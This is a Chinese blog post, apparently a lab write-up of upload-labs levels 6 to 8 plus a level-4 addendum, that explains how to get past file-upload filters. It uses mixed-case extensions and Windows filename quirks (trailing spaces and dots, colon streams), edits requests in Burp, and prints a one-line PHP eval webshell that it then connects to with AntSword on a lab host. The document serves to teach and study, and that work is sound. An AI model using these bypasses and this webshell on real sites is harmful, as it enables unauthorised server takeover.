渗透测试-文件上传之大小写和window特性绕过(三)

文件上传之大小写和window特性绕过

文件上传upload-labs实验室第6,7,8关

前言

一、什么是window特性

window特性就是window对于文件的后缀名自动的修改,例如空格和点,冒号后面的内容都省略掉,可以利用window特性进行绕过。

二、大小写和window特性绕过

1.大小写绕过

第六关没有限制大小写,可以进行大小写绕过
watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA54Kr5b2pQOS5i-aYnw==,size_20,color_FFFFFF,t_70,g_se,x_16
上传文件zhi.PhP
watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA54Kr5b2pQOS5i-aYnw==,size_20,color_FFFFFF,t_70,g_se,x_16上传成功。
复制网址到蚁剑进行连接
http://192.168.222.4/upload/upload/202204160654088873.PhP
watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA54Kr5b2pQOS5i-aYnw==,size_20,color_FFFFFF,t_70,g_se,x_16
连接成功,成功拿到shell。

这里补充关卡四,实验还有另一个方法,也可以行的通就是利用window特性冒号进行绕过。
第一步
上传58.jpg文件
watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA54Kr5b2pQOS5i-aYnw==,size_20,color_FFFFFF,t_70,g_se,x_16
第二步
用burp抓包,修改后缀名,修改为58.php:.jpg重发
watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA54Kr5b2pQOS5i-aYnw==,size_20,color_FFFFFF,t_70,g_se,x_16
修改成功,成功上传58.php文件,将58.php:.jpg解析成.php文件,冒号后面的内容都会省略掉,会生成.php文件
watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA54Kr5b2pQOS5i-aYnw==,size_14,color_FFFFFF,t_70,g_se,x_16
在burp上再修改为58.<进行重发
watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA54Kr5b2pQOS5i-aYnw==,size_20,color_FFFFFF,t_70,g_se,x_16
再查看文件大小,原来上传的时候是0kb,再上传是大小增加了
watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA54Kr5b2pQOS5i-aYnw==,size_17,color_FFFFFF,t_70,g_se,x_16
打开文件查看,里面存在一句话木马

<?php @eval($_POST['chopper']); ?>

watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA54Kr5b2pQOS5i-aYnw==,size_20,color_FFFFFF,t_70,g_se,x_16
复制网址上传到蚁剑进行连接
http://192.168.222.4/upload/upload/58.php
watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA54Kr5b2pQOS5i-aYnw==,size_20,color_FFFFFF,t_70,g_se,x_16
连接成功,成功拿到shell。

关卡四的实验原理很简单,利用window和php环境的叠加特性,以下符号在正则匹配时的相等性:
双引号’’ = 点号.
大于符号> = 问号?
小于符号< = 星号*

上面则是用了<号,再次上传58.<,重写58.php内容,webshell代码就会写入原来的空文件中。

2.利用空格和点绕过

接下来进行第七关
看一下源代码,发现没有限制空格
watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA54Kr5b2pQOS5i-aYnw==,size_20,color_FFFFFF,t_70,g_se,x_16
利用空格进行绕过,在window中,空格会自动省略
上传zhi.PhP文件,进行抓包修改文件后缀名
watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA54Kr5b2pQOS5i-aYnw==,size_20,color_FFFFFF,t_70,g_se,x_16
在zhi.PhP后面加上空格和点
watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA54Kr5b2pQOS5i-aYnw==,size_20,color_FFFFFF,t_70,g_se,x_16
找到路径
…/upload/202204160636393878.php
复制网址到蚁剑进行连接
http://192.168.222.4/upload/upload//202204160748393371.php
watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA54Kr5b2pQOS5i-aYnw==,size_20,color_FFFFFF,t_70,g_se,x_16
连接成功,成功拿到shell。

第八关
查看源码可知没有限制点,利用点进行绕过
watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA54Kr5b2pQOS5i-aYnw==,size_20,color_FFFFFF,t_70,g_se,x_16
上传58.jpg文件,进行抓包修改为58.php.
watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA54Kr5b2pQOS5i-aYnw==,size_20,color_FFFFFF,t_70,g_se,x_16
watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA54Kr5b2pQOS5i-aYnw==,size_20,color_FFFFFF,t_70,g_se,x_16
复制网址到蚁剑连接
http://192.168.222.4/upload/upload/58.php
watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBA54Kr5b2pQOS5i-aYnw==,size_20,color_FFFFFF,t_70,g_se,x_16#pic_center
连接成功,成功拿到shell。

总结

本次实验是对文件上传漏洞进一步提升练习,学会了window特性方法的绕过,介绍了几种常用的绕过方法。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

炫彩@之星

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值